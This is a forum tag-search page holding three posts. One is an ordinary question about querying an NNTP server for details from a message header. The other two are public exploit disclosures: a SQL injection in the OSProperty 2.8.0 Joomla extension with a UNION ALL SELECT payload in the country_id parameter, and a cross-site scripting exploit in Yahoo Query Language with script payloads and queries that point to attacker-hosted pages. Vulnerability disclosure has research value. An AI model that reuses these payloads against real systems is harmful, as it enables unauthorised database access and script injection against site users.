Search the Community
Showing results for tags 'query'.
-
Hi, I have a log from a newsgroup NNTP header from a newsgroup message containing 3 string/numbers which I would like to further investigate Xref: news.netfront.net 24hoursupport.helpdesk:77925 Injection-Info:logging-data="74569" AND Message-ID: qjmbe4$28q9$1@adenine.netfront.net is there a tool/script/program to query remote NNTP server adenine.netfront.net / netfront.net with those string/numbers 77925/74569/qjmbe4$28q9$1 that would return more info ? thank's in advance :)
-
OS Solution OSProperty 2.8.0 was vulnerable to an unauthenticated SQL injection in the country_id parameter of the request made to retrieve a list of states for a given country. The version was not bumped when the vulnerability was fixed, but if you download after April 27th, you downloaded a fixed version. http://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/os-property http://joomdonation.com/joomla-extensions/os-property-joomla-real-estate.html Example URL: http://172.31.16.51/index.php?option=com_osproperty&no_html=1&tmpl=component&task=ajax_loadStateInListPage&country_id=31 Parameter: country_id (GET) Type: UNION query Title: MySQL UNION query (NULL) - 2 columns Payload: option=com_osproperty&no_html=1&tmpl=component&task=ajax_loadStateInListPage&country_id=31' UNION ALL SELECT NULL,CONCAT(0x716a627171,0x797774584a4b4954714d,0x7162717071)# -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website Source
-
- osproperty
- query
-
(and 3 more)
Tagged with:
-
/*********************************************************************************** ** Exploit Title: Yahoo Query Language Cross Site Scripting Vulnerability ** ** Exploit Author: Peyman D. aka C4T ** ** Vendor Homepage : http://query.yahooapis.com/ ** ** Google Dork: none ** ** Date: 2015-03-08 ** ** Tested on: Windows 7 / Mozila Firefox ** ************************************************************************************ ** Exploit Code: ****************** <html xmlns="http://www.w3.org/1999/xhtml"> <body> <span>Discovered by Peyman D.</span> <span>aka C4T</span> <script> alert('Successfully Exploited'); </script> </body> </html> ************************************************************************************ Location & Vulnerable query: ****************** http://query.yahooapis.com/v1/public/yql?q= select * from html where url='[attacker-website.com]/exploit.html' and xpath='html' ************************************************************************************* ** Proof: ****************** Executable script tag in API's own page: Malicious source: http://hatrhyme.com/alert.html Exploit query: http://query.yahooapis.com/v1/public/yql?q= select * from html where url='http://hatrhyme.com/alert.html' and xpath='html' ------------------------------------------------------- Injecting HTML tags in API's own page: Malicious source: http://hatrhyme.com/expl.html Exploit query: http://query.yahooapis.com/v1/public/yql?q= select * from html where url='http://hatrhyme.com/expl.html' and xpath='html' ------------------------------------------------------- ****************************************************************************************** ** ** Explanation and the cause of this vulnerability: ** ** http://hatrhyme.com/XSSInYQL.pdf ** ****************************************************************************************** Source